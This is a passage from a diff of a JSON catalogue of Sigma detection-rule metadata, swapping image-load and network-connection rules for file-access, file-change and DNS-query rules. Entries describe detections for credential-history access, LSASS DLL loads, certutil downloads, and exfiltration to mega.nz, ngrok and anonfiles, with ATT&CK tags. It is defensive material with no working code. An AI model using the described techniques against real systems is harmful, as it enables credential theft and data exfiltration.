by looking for some of the DLLs needed for it.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Other legitimate processes loading those DLLs in your environment." - ], - "filename": "image_load_uipromptforcreds_dlls.yml", + "filename": "file_access_win_susp_cred_hist_access.yml", "level": "medium", - "logsource.category": "image_load", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", - "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" ], "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1555.004" ] }, - "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", - "value": "UIPromptForCredentials DLLs" + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File" }, { - "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Valid 
user connecting using RDP" - ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "value": "Unsigned Image Loaded Into LSASS Process" - }, - { - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/07", - "falsepositive": [ - "Rarely observed" - ], - "filename": "image_load_usp_svchost_clfsw32.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", - "value": "APT PRIVATELOG Image Load Pattern" - }, - { - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/02", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - 
"https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "value": "VMware Xfer Loading DLL from Nondefault Path" - }, - { - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/17", - "falsepositive": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" - ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", - "https://twitter.com/dez_/status/986614411711442944", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1220" - ] - }, - "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "value": "WMIC Loading Scripting Libraries" - }, - { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it 
for a WMI DLL Hijack scenario.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/12", + "author": "Tim Rauch", + "creation_date": "2022/09/27", "falsepositive": [ "Unknown" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", "level": "high", - "logsource.category": "image_load", + "logsource.category": "file_change", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ] }, - "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", - "value": "Wmiprvse Wbemcomn DLL Hijack" + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe" }, { - "description": "Detects non wmiprvse loading WMI modules", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_wmi_module_load.yml", - "level": "informational", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", - "value": "WMI Modules Loaded" - }, 
- { - "description": "Detects WMI command line event consumers", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" - ], - "tags": [ - "attack.t1546.003", - "attack.persistence" - ] - }, - "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "value": "WMI Persistence - Command Line Event Consumer" - }, - { - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_wsman_provider_image_load.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/chadtilbury/status/1275851297770610688", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", - "https://github.com/bohops/WSMan-WinRM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "value": "Suspicious WSMAN Provider Image Loads" - }, - { - "description": "Detects an executable in the Windows folder accessing github.com", - "meta": { - "author": "Michael 
Haag (idea), Florian Roth (rule)", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown", - "@subTee in your network" - ], - "filename": "net_connection_win_binary_github_com.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "value": "Microsoft Binary Github Communication" - }, - { - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_binary_susp_com.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "value": "Microsoft Binary Suspicious Communication Endpoint" - }, - { - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", "meta": { "author": "frack113, Florian Roth", - "creation_date": "2022/09/02", + "creation_date": "2022/08/12", "falsepositive": [ - "Legitimate certutil network connection" + "Changes made to or by the local NTP service" ], - "filename": "net_connection_win_certutil.yml", + "filename": "file_change_win_2022_timestomping.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "file_change", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ] + }, + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year" + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus" + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + "filename": "dns_query_win_anonymfiles_com.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain" + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lobas_appinstaller.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" ], "tags": [ "attack.command_and_control", "attack.t1105" ] }, - "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", - "value": "Certutil Initiated Connection" + "uuid": 
"7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS" }, { - "description": "Detects process connections to a Monero crypto mining pool", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", + "author": "frack113, Connor Martin", + "creation_date": "2022/07/11", "falsepositive": [ - "Legitimate use of crypto miners" + "Legitimate usage of the softwares mentioned above" ], - "filename": "net_connection_win_crypto_mining.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496" - ] - }, - "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "value": "Windows Crypto Mining Pool Connections" - }, - { - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "meta": { - "author": "Sorina Ionescu", - "creation_date": "2022/08/17", - "falsepositive": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." 
- ], - "filename": "net_connection_win_dead_drop_resolvers.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://content.fireeye.com/apt-41/rpt-apt41", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" - ] - }, - "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "value": "Dead Drop Resolvers" - }, - { - "description": "Detects Dllhost that communicates with public IP addresses", - "meta": { - "author": "bartblaze", - "creation_date": "2020/07/13", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "filename": "net_connection_win_dllhost_net_connections.yml", + "filename": "dns_query_win_remote_access_software_domains.yml", "level": "medium", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" - ] - }, - "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", - "value": "Dllhost Internet Connection" - }, - { - "description": "Detects network connections from Equation Editor", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_eqnedt.yml", - "level": "high", - "logsource.category": 
"network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/forensicitguy/status/1513538712986079238", - "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ] - }, - "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "value": "Equation Editor Network Connection" - }, - { - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", - "creation_date": "2021/11/10", - "falsepositive": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
- ], - "filename": "net_connection_win_excel_outbound_network_connection.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://corelight.com/blog/detecting-cve-2021-42292", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203" - ] - }, - "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "value": "Excel Network Connections" - }, - { - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_hh.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.001" - ] - }, - "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", - "value": "HH.EXE Network Connections" - }, - { - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Legitimate script" - ], - "filename": "net_connection_win_imewdbld.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", 
- "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ] }, - "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", - "value": "Download a File with IMEWDBLD.exe" - }, - { - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/19", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_malware_backconnect_ports.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ] - }, - "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", - "value": "Suspicious Typical Malware Back Connect Ports" - }, - { - "description": "Detects an executable accessing mega.co.nz, which could 
be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/06", - "falsepositive": [ - "Legitimate use of mega.nz uploaders and tools" - ], - "filename": "net_connection_win_mega_nz.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://megatools.megous.com/", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "value": "Communication To Mega.nz" - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate msiexec over networks" - ], - "filename": "net_connection_win_msiexec.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "value": "Msiexec Initiated Connection" - }, - { - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": 
"Florian Roth", - "creation_date": "2022/07/16", - "falsepositive": [ - "Legitimate use of ngrok.io" - ], - "filename": "net_connection_win_ngrok_io.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://ngrok.com/", - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.001" - ] - }, - "uuid": "18249279-932f-45e2-b37a-8925f2597670", - "value": "Communication To Ngrok.Io" - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/03", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "filename": "net_connection_win_ngrok_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ] - }, - "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", - "value": "Communication To Ngrok Tunneling Service" - }, - { - "description": "Detects suspicious network connection by Notepad", - "meta": { - "author": "EagleEye Team", - "creation_date": "2020/05/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_notepad_network_connection.yml", - "level": "high", - 
"logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", - "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "value": "Notepad Making Network Connection" - }, - { - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/13", - "falsepositive": [ - "Administrative scripts", - "Microsoft IP range" - ], - "filename": "net_connection_win_powershell_network_connection.yml", - "level": "low", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.youtube.com/watch?v=DLtJTxMWZ2o", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "value": "PowerShell Network Connections" - }, - { - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Legitimate python script" - ], - "filename": "net_connection_win_python.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", - "https://pypi.org/project/scapy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ] - }, - "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", - "value": "Python Initiated Connection" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/02/16", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "value": "RDP Over Reverse SSH Tunnel" - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/29", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_rdp_to_http.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", - "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" - 
